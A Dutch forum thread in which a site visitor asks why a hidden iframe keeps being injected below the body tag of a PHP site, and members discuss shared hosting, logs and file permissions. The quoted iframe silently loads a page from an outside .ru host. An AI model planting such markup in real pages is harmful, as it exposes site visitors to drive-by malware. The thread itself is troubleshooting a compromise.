Html injection

Plaats reactie
crapiecorn
Elite Poster
Elite Poster
Uitgedeelde bedankjes: 44 keer
Bedankt: 12 keer

Een site die ik regelmatig bezoek is al een paar keer aangevallen door een soort van code injection.

Code: Selecteer alles

<iframe name='StatPage' src='http://stelaartois.ru/xxxxx2.php' width=5 height=5 style='display:none'></iframe>

Dit wordt altijd net onder de body toegevoegd. Sql injection en via forms is al uitgesloten. Code is ook custom. Heeft iemand misschien een idee wat dit kan veroorzaken ? (file permissions staan ook goed)
Laatst gewijzigd door crapiecorn 30 nov 2006, 19:14, in totaal 2 gewijzigd.
meon
Administrator
Administrator
Twitter: meon
Uitgedeelde bedankjes: 564 keer
Bedankt: 759 keer
Contacteer:

Is dit op shared hosting?
Of Virtual Hosting?
crapiecorn
Elite Poster
Elite Poster

shared
wem
Premium Member
Premium Member

zijn het pure html-files, of php-files (of nog iets anders)?
Kan je zien wanneer ze gewijzigd zijn? Zo kan je via de logs van de server misschien rare http-queries vinden die tot de oorzaak leiden.
meon
Administrator
Administrator
Twitter: meon
Uitgedeelde bedankjes: 564 keer
Bedankt: 759 keer
Contacteer:

Indien shared: afh. van de configuratie kunnen anderen die toegang hebben tot de server (andere klanten) soms met wat spelen met eigen PHP-scripts toegang tot anderen hun files krijgen. Zou dit gebeurd kunnen zijn?
KK
Elite Poster
Elite Poster

Er moet maar 1 klant zijn die op zijn site een slecht beveiligd formulier staan heeft (waardoor er code kan uitgevoerd worden), om het voor alle andere klanten om zeep te helpen.
crapiecorn
Elite Poster
Elite Poster

meon schreef:Indien shared: afh. van de configuratie kunnen anderen die toegang hebben tot de server (andere klanten) soms met wat spelen met eigen PHP-scripts toegang tot anderen hun files krijgen. Zou dit gebeurd kunnen zijn?

Ik denk dat het probleem groter is dan 1 server alleen. Ik heb zowel amerikaanse als chinese, duitse websites gevonden met dit probleem. Website draait een soort van custom portal system in php/mysql. Met shared hosting ben je uiteindelijk zeer beperkt voor logs na te kijken.
wem
Premium Member
Premium Member

crapiecorn schreef:Met shared hosting ben je uiteindelijk zeer beperkt voor logs na te kijken.

Toch is het soms mogelijk dit zelf te doen (ik weet dat ik op mijn vroegere hosting volledige access tot mijn logs had, nu heb ik er geen idee van eigelijk). En anders kan je, in zo'n geval, nog altijd gedetailleerde informatie vragen aan het hosting-bedrijf.

Worden scripts eigelijk uitgevoerd met jou rechten, of met die van de webserver-account? En is schrijven op die files toegelaten, of is ook dat aangepast?
Plaats reactie

Terug naar “Development”